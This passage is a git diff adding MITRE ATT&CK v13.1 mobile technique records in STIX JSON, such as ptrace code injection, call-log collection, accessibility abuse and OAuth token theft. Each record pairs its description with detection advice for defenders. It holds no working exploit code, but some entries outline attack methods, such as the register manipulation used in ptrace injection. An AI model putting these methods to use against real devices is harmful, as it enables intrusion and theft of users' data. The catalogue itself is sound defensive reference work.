b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--1b51f5bc-b97a-498a-8dbd-bc6b1901bf19.json 
@@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--b373a8d1-e263-4132-aabe-b45e3f98049f", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:55:23.702Z", + "name": "Process Discovery", + "description": "Adversaries may attempt to get information about running processes on a device. Information obtained could be used to gain an understanding of common software/applications running on devices within a network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1424) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. \n\n \n\nRecent Android security enhancements have made it more difficult to obtain a list of running processes. On Android 7 and later, there is no way for an application to obtain the process list without abusing elevated privileges. This is due to the Android kernel utilizing the `hidepid` mount feature. Prior to Android 7, applications could utilize the `ps` command or examine the `/proc` directory on the device.(Citation: Android-SELinuxChanges) \n\n \n\nIn iOS, applications have previously been able to use the `sysctl` command to obtain a list of running processes. This functionality has been removed in later iOS versions. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "discovery" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Mobile security products can typically detect rooted devices, which is an indication that Process Discovery is possible. Application vetting could potentially detect when applications attempt to abuse root access or root the system itself. 
Further, application vetting services could look for attempted usage of legacy process discovery mechanisms, such as the usage of `ps` or inspection of the `/proc` directory.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "2.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--1b51f5bc-b97a-498a-8dbd-bc6b1901bf19", + "created": "2017-10-25T14:48:33.926Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1424", + "external_id": "T1424" + }, + { + "source_name": "Android-SELinuxChanges", + "description": "Various. (2016, March 31). Overly restrictive SELinux filesystem permissions in Android N. Retrieved December 21, 2016.", + "url": "https://code.google.com/p/android/issues/detail?id=205565" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d.json new file mode 100644 index 0000000000000000000000000000000000000000..137478e7e82472d82acaf13c10b627e268291102 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d.json 
@@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--a072dafb-5f0b-4bc8-a380-761a231eb271", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-16T18:32:30.150Z", + "name": "Call Log", + "description": "Adversaries may utilize standard operating system APIs to gather call log data. On Android, this can be accomplished using the Call Log Content Provider. iOS provides no standard API to access the call log. \n\n \n\nIf the device has been jailbroken or rooted, an adversary may be able to access the [Call Log](https://attack.mitre.org/techniques/T1636/002) without the user\u2019s knowledge or approval. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "On Android, the user can manage which applications have permission to access the call log through the device settings screen, revoking the permission if necessary. Application vetting services could look for `android.permission.READ_CALL_LOG` in an Android application\u2019s manifest. Most applications do not need call log access, so extra scrutiny could be applied to those that request it. 
", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "created": "2022-04-01T13:12:23.522Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1636/002", + "external_id": "T1636.002" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html", + "external_id": "APP-13" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--1d44f529-6fe6-489f-8a01-6261ac43f05e.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--1d44f529-6fe6-489f-8a01-6261ac43f05e.json new file mode 100644 index 0000000000000000000000000000000000000000..33f6a12bcd1753d8d2072123698c37574ee0f19e --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--1d44f529-6fe6-489f-8a01-6261ac43f05e.json 
@@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--2c10842c-8b18-4447-9b16-9ca8105dd7c1", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:55:33.642Z", + "name": "Security Software Discovery", + "description": "Adversaries may attempt to get a listing of security applications and configurations that are installed on a device. This may include things such as mobile security products. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1418/001) during automated discovery to shape follow-on behaviors, including whether or not to fully infect the target and/or attempt specific actions. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "discovery" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services could look for the Android permission `android.permission.QUERY_ALL_PACKAGES`, and apply extra scrutiny to applications that request it. 
On iOS, application vetting services could look for usage of the private API `LSApplicationWorkspace` and apply extra scrutiny to applications that employ it.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--1d44f529-6fe6-489f-8a01-6261ac43f05e", + "created": "2022-03-31T19:50:45.752Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1418/001", + "external_id": "T1418.001" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-12.html", + "external_id": "APP-12" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--1f96d624-8409-4472-ad8a-30618ee6b2e2.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--1f96d624-8409-4472-ad8a-30618ee6b2e2.json new file mode 100644 index 0000000000000000000000000000000000000000..367e07944d3b4f38f70c9c6b268bc9c421cf2e29 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--1f96d624-8409-4472-ad8a-30618ee6b2e2.json 
@@ -0,0 +1,27 @@ +{ + "type": "bundle", + "id": "bundle--a1530391-b8dc-44c7-9446-89ee308d8797", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "id": "attack-pattern--1f96d624-8409-4472-ad8a-30618ee6b2e2", + "type": "attack-pattern", + "created": "2017-10-25T14:48:10.699Z", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-mobile-attack", + "url": "https://attack.mitre.org/techniques/T1434", + "external_id": "T1434" + } + ], + "modified": "2018-10-17T01:05:10.699Z", + "name": "App Delivered via Email Attachment", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--1ff89c1b-7615-4fe8-b9cb-63aaf52e6dee.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--1ff89c1b-7615-4fe8-b9cb-63aaf52e6dee.json new file mode 100644 index 0000000000000000000000000000000000000000..f1d7046201de192ab7f87c511ba455345fa459bc --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--1ff89c1b-7615-4fe8-b9cb-63aaf52e6dee.json 
@@ -0,0 +1,68 @@ +{ + "type": "bundle", + "id": "bundle--a577afff-5bc8-48d9-a7b7-6960e78dc7cf", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:57:40.571Z", + "name": "Ptrace System Calls", + "description": "Adversaries may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges. Ptrace system call injection is a method of executing arbitrary code in the address space of a separate live process. \n\nPtrace system call injection involves attaching to and modifying a running process. The ptrace system call enables a debugging process to observe and control another process (and each individual thread), including changing memory and register values.(Citation: PTRACE man) Ptrace system call injection is commonly performed by writing arbitrary code into a running process (e.g., by using `malloc`) then invoking that memory with `PTRACE_SETREGS` to set the register containing the next instruction to execute. Ptrace system call injection can also be done with `PTRACE_POKETEXT`/`PTRACE_POKEDATA`, which copy data to a specific address in the target process's memory (e.g., the current address of the next instruction).(Citation: PTRACE man)(Citation: Medium Ptrace JUL 2018) \n\nPtrace system call injection may not be possible when targeting processes with high-privileges, and on some systems those that are non-child processes.(Citation: BH Linux Inject) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. 
Execution via ptrace system call injection may also evade detection from security products since the execution is masked under a legitimate process.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services could look for misuse of dynamic libraries.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--1ff89c1b-7615-4fe8-b9cb-63aaf52e6dee", + "created": "2022-03-30T19:05:17.048Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1631/001", + "external_id": "T1631.001" + }, + { + "source_name": "BH Linux Inject", + "description": "Colgan, T. (2015, August 15). Linux-Inject. Retrieved February 21, 2020.", + "url": "https://github.com/gaffe23/linux-inject/blob/master/slides_BHArsenal2015.pdf" + }, + { + "source_name": "Medium Ptrace JUL 2018", + "description": "Jain, S. (2018, July 25). Code injection in running process using ptrace. Retrieved February 21, 2020.", + "url": "https://medium.com/@jain.sm/code-injection-in-running-process-using-ptrace-d3ea7191a4be" + }, + { + "source_name": "PTRACE man", + "description": "Kerrisk, M. (2020, February 9). PTRACE(2) - Linux Programmer's Manual. 
Retrieved February 21, 2020.", + "url": "http://man7.org/linux/man-pages/man2/ptrace.2.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--20b0931a-8952-42ca-975f-775bad295f1a.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--20b0931a-8952-42ca-975f-775bad295f1a.json new file mode 100644 index 0000000000000000000000000000000000000000..406a1895cccc50918f6242f83c02ee70ddf4c002 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--20b0931a-8952-42ca-975f-775bad295f1a.json 
@@ -0,0 +1,58 @@ +{ + "type": "bundle", + "id": "bundle--e3320dba-5a09-482a-9074-e04a99a89c79", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:59:55.849Z", + "name": "Impair Defenses", + "description": "Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may span both native defenses as well as supplemental capabilities installed by users or mobile endpoint administrators.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Mobile security products integrated with Samsung Knox for Mobile Threat Defense can monitor processes to see if security tools are killed or stop running. Application vetting can detect many techniques associated with impairing device defenses.(Citation: Samsung Knox Mobile Threat Defense)", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--20b0931a-8952-42ca-975f-775bad295f1a", + "created": "2022-04-01T18:42:22.117Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1629", + "external_id": "T1629" + }, + { + "source_name": "Samsung Knox Mobile Threat Defense", + "description": "Samsung Knox Partner Program. (n.d.). Knox for Mobile Threat Defense. 
Retrieved March 30, 2022.", + "url": "https://partner.samsungknox.com/mtd" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-22.html", + "external_id": "APP-22" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--2204c371-6100-4ae0-82f3-25c07c29772a.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--2204c371-6100-4ae0-82f3-25c07c29772a.json new file mode 100644 index 0000000000000000000000000000000000000000..34e9512e40f8a15c3ba7f49ba06b927fb316f7fd --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--2204c371-6100-4ae0-82f3-25c07c29772a.json 
@@ -0,0 +1,75 @@ +{ + "type": "bundle", + "id": "bundle--41678525-7554-432b-9448-d83257461c68", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_contributors": [ + "Luk\u00e1\u0161 \u0160tefanko, ESET" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--2204c371-6100-4ae0-82f3-25c07c29772a", + "type": "attack-pattern", + "created": "2017-10-25T14:48:08.613Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-mobile-attack", + "external_id": "T1453", + "url": "https://attack.mitre.org/techniques/T1453" + }, + { + "url": "https://www.skycure.com/blog/accessibility-clickjacking/", + "description": "Yair Amit. (2016, March 3). \u201cAccessibility Clickjacking\u201d \u2013 The Next Evolution in Android Malware that Impacts More Than 500 Million Devices. Retrieved December 21, 2016.", + "source_name": "Skycure-Accessibility" + }, + { + "description": "Luk\u00e1\u0161 \u0160tefanko. (2018, December 11). Android Trojan steals money from PayPal accounts even with 2FA on. Retrieved July 11, 2019.", + "url": "https://www.welivesecurity.com/2018/12/11/android-trojan-steals-money-paypal-accounts-2fa/", + "source_name": "android-trojan-steals-paypal-2fa" + }, + { + "source_name": "banking-trojans-google-play", + "url": "https://www.welivesecurity.com/2018/10/24/banking-trojans-continue-surface-google-play/", + "description": "Luk\u00e1\u0161 \u0160tefanko. (2018, October 24). Banking Trojans continue to surface on Google Play. Retrieved July 11, 2019." + } + ], + "modified": "2020-03-30T14:03:43.761Z", + "name": "Abuse Accessibility Features", + "description": "**This technique has been deprecated. 
Please use [Input Capture](https://attack.mitre.org/techniques/T1417), [Input Injection](https://attack.mitre.org/techniques/T1516), and [Input Prompt](https://attack.mitre.org/techniques/T1411) where appropriate.**\n\nA malicious app could abuse Android's accessibility features to capture sensitive data or perform other malicious actions.(Citation: Skycure-Accessibility)\n\nAdversaries may abuse accessibility features on Android to emulate a user's clicks, for example to steal money from a user's bank account.(Citation: android-trojan-steals-paypal-2fa)(Citation: banking-trojans-google-play)\n\nAdversaries may abuse accessibility features on Android devices to evade defenses by repeatedly clicking the \"Back\" button when a targeted app manager or mobile security app is launched, or when strings suggesting uninstallation are detected in the foreground. This effectively prevents the malicious application from being uninstalled.(Citation: android-trojan-steals-paypal-2fa)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "credential-access" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "impact" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": true, + "x_mitre_version": "2.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--22379609-a99f-4a01-bd7e-70f3e105859d.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--22379609-a99f-4a01-bd7e-70f3e105859d.json new file mode 100644 index 0000000000000000000000000000000000000000..f13a1b8b97e3663f9bd319e0989ee9180ccedc14 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--22379609-a99f-4a01-bd7e-70f3e105859d.json 
@@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--a84f6236-d4b3-4c88-a18a-c64a1d57df4b", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:51:07.651Z", + "name": "Exploitation of Remote Services", + "description": "Adversaries may exploit remote services of enterprise servers, workstations, or other resources to gain unauthorized access to internal systems once inside of a network. Adversaries may exploit remote services by taking advantage of a mobile device\u2019s access to an internal enterprise network through local connectivity or through a Virtual Private Network (VPN). Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system. \n\nAn adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Scanning](https://attack.mitre.org/techniques/T1423) or other Discovery methods. These look for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources.\n\nDepending on the permissions level of the vulnerable remote service, an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1404) as a result of lateral movement exploitation as well. 
", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Detecting software exploitation initiated by a mobile device may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash.\n\nNetwork traffic analysis could reveal patterns of compromise if devices attempt to access unusual targets or resources. \n\nApplication vetting may be able to identify applications that perform Discovery or utilize existing connectivity to remotely access hosts within an internal enterprise network. ", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.2", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--22379609-a99f-4a01-bd7e-70f3e105859d", + "created": "2017-10-25T14:48:13.259Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1428", + "external_id": "T1428" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-32.html", + "external_id": "APP-32" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add.json new file mode 100644 index 0000000000000000000000000000000000000000..95e8e60586e636d02c3e4ad3afe9ee75f21db095 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add.json 
@@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--4ccbcc03-cd6f-4f9f-9509-0ac44b46efbf", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "created": "2022-04-01T19:06:27.177Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1437.001", + "url": "https://attack.mitre.org/techniques/T1437/001" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-29.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-29" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may communicate using application layer protocols associated with web protocols traffic to avoid detection/network filtering by blending in with existing traffic. Commands to remote mobile devices, and often the results of those commands, will be embedded within the protocol traffic between the mobile client and server. \n\nWeb protocols such as HTTP and HTTPS are used for web traffic as well as well as notification services native to mobile messaging services such as Google Cloud Messaging (GCM) and newly, Firebase Cloud Messaging (FCM), (GCM/FCM: two-way communication) and Apple Push Notification Service (APNS; one-way server-to-device). Such notification services leverage HTTP/S via the respective API and are commonly abused on Android and iOS respectively in order blend in with routine device traffic making it difficult for enterprises to inspect. 
", + "modified": "2022-04-06T13:07:45.661Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Web Protocols", + "x_mitre_detection": "Abuse of standard application protocols can be difficult to detect as many legitimate mobile applications leverage such protocols for language-specific APIs. Enterprises may be better served focusing on detection at other stages of adversarial behavior. ", + "kill_chain_phases": [ + { + "phase_name": "command-and-control", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": true, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--233fe2c0-cb41-4765-b454-e0087597fbce.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--233fe2c0-cb41-4765-b454-e0087597fbce.json new file mode 100644 index 0000000000000000000000000000000000000000..926c803bade857d2755028951d930a9108fc274b --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--233fe2c0-cb41-4765-b454-e0087597fbce.json 
@@ -0,0 +1,74 @@ +{ + "type": "bundle", + "id": "bundle--5bd5f78a-ca97-4f0c-ae12-875e27df8883", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:53:52.292Z", + "name": "Steal Application Access Token", + "description": "Adversaries can steal user application access tokens as a means of acquiring credentials to access remote systems and resources. This can occur through social engineering or URI hijacking and typically requires user action to grant access, such as through a system \u201cOpen With\u201d dialogue. \n\nApplication access tokens are used to make authorized API requests on behalf of a user and are commonly used as a way to access resources in cloud-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework used to issue tokens to users for access to systems. An application desiring access to cloud-based services or protected APIs can gain entry through OAuth 2.0 using a variety of authorization protocols. An example of a commonly-used sequence is Microsoft's Authorization Code Grant flow.(Citation: Microsoft Identity Platform Protocols May 2019)(Citation: Microsoft - OAuth Code Authorization flow - June 2019) An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested without requiring user credentials.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "On Android, users may be presented with a popup to select the appropriate application to open a URI in. If the user sees an application they do not recognize, they can remove it. When vetting applications for potential security weaknesses, the vetting process could look for insecure use of Intents. 
Developers should be encouraged to use techniques to ensure that the intent can only be sent to an appropriate destination (e.g., use explicit rather than implicit intents, permission checking, checking of the destination app's signing certificate, or utilizing the App Links feature). For mobile applications using OAuth, encourage use of best practice.(Citation: IETF-OAuthNativeApps)(Citation: Android-AppLinks)", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--233fe2c0-cb41-4765-b454-e0087597fbce", + "created": "2022-04-01T15:12:50.740Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1635", + "external_id": "T1635" + }, + { + "source_name": "Android-AppLinks", + "description": "Android. (n.d.). Handling App Links. Retrieved December 21, 2016.", + "url": "https://developer.android.com/training/app-links/index.html" + }, + { + "source_name": "Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019", + "description": "Auth0. (n.d.). Why You Should Always Use Access Tokens to Secure APIs. Retrieved September 12, 2019.", + "url": "https://auth0.com/blog/why-should-use-accesstokens-to-secure-an-api/" + }, + { + "source_name": "Microsoft - OAuth Code Authorization flow - June 2019", + "description": "Microsoft. (n.d.). Microsoft identity platform and OAuth 2.0 authorization code flow. Retrieved September 12, 2019.", + "url": "https://docs.microsoft.com/en-us/azure/active-directory/develop/v2-oauth2-auth-code-flow" + }, + { + "source_name": "Microsoft Identity Platform Protocols May 2019", + "description": "Microsoft. (n.d.). 
Retrieved September 12, 2019.", + "url": "https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-v2-protocols" + }, + { + "source_name": "IETF-OAuthNativeApps", + "description": "W. Denniss and J. Bradley. (2017, October). IETF RFC 8252: OAuth 2.0 for Native Apps. Retrieved November 30, 2018.", + "url": "https://tools.ietf.org/html/rfc8252" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--24a77e53-0751-46fc-b207-99378fb35c08.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--24a77e53-0751-46fc-b207-99378fb35c08.json new file mode 100644 index 0000000000000000000000000000000000000000..340e35ac733ac9d05ea651286965db1c44fabf06 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--24a77e53-0751-46fc-b207-99378fb35c08.json 
